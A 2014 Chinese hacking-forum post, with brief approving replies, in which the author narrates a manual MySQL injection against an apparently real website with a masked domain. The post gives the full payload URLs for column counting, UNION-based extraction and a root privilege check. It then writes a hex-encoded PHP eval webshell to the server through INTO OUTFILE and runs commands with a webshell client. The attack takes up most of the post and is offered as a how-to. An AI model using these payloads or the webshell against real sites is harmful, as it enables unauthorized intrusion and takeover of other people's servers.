查看: 39012|回复: 3

MYSQL纯手工注入(菜鸟的法宝,大牛千万不要来啊!!)

[复制链接]

该用户从未签到

发表于 2014-3-24 13:48:23 | 显示全部楼层 |阅读模式
MYSQL 纯手工注入

0x001:  
  今天在一个网站习惯性的加上了一个  ‘

结果: QQ截图20140324131325.gif

爆出了绝对路径然后试了一下

And 1=1,  and 1=2 返回的结果不一样,说明存在注入点。

爆出网站根目录:D:\WWW\include\function.php


0x002:  现在就先试一试看看有多少个字段。  Order by 猜测字段数。 经过几次的试探后,  
       得出有25个字段
     利用:www.xxoo.com/index.php?id=6666  and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
   爆出字段位置

如图:
QQ截图20140324132010.gif

0x003:  现在我们来看看权限如何:
www.xxoo.com/index.php?id=6666  and 1=2 union select 1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
图片1.png

呵呵,RP不错是root权限

好的我们现在来试一试 into outfile 一句话木马

一句话木马是:<?php eval($_POST[z]);?>

转换为16进制:0x3C3F706870206576616C28245F504F53545B7A5D293B3F3E

一般直接写一句话木马,导出文件是不成功的,必须是转换为16进制,或者asc
(本人也是菜鸟,原理应该是这样的)


0x004: 导出一句话木马

利用:www.xxoo.com/index.php?id=6666  and 1=2 union select 1,2,3,4,0x3C3F706870206576616C28245F504F53545B7A5D293B3F3E,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 into outfile ‘D:\WWW\include\function\ok.php’

试了一下,不成功的。

然后我又吧反斜杠换了一下;
www.xxoo.com/index.php?id=6666  and 1=2 union select 1,2,3,4,0x3C3F706870206576616C28245F504F53545B7A5D293B3F3E,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 into outfile ‘D:/WWW/include/function/ok.php’
看了还是不行,不知道为什么。我原来看哪些大牛那样就可以的,为什么我不可以。
后来想了一下,是不是web端的路径便是方式跟windows本身目录有差别呢?  然后就在路径中把单反斜杠变成双反斜杠。
试了一下

www.xxoo.com/index.php?id=6666  and 1=2 union select 1,2,3,4,0x3C3F706870206576616C28245F504F53545B7A5D293B3F3E,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 into outfile ‘D:\\WWW\include\function\\ok.php’

然后再访问一下:

QQ截图20140324133058.gif

成功之够短菜刀掏出来:

QQ截图20140324133338.gif
QQ截图20140324133550.gif

0x005: 提权

我直接:在菜刀里执行命令,  权限非常大




但是。。。是内网的。 我又是内网的主机   所以无法端口转发。

好吧,就这样了把。  我技术很菜。有什么不对的地方请大家指出来,我学习一下

大家一起进步!!!!
QQ截图20140324133615.gif

评分

参与人数 1i币 +16 收起 理由
90_ + 16 支持原创

查看全部评分

回复

使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-5 19:19
  • 签到天数: 238 天

    [LV.7]常住居民III

    发表于 2014-3-24 18:32:03 | 显示全部楼层
    不错,顶个
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-3-24 19:32:17 | 显示全部楼层
    学习了~~~~~谢谢分享
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    难过
    2016-8-26 14:36
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    发表于 2014-3-24 22:03:25 | 显示全部楼层
    写得不错啊,给个赞
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-24 10:35 , Processed in 0.042398 second(s), 17 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部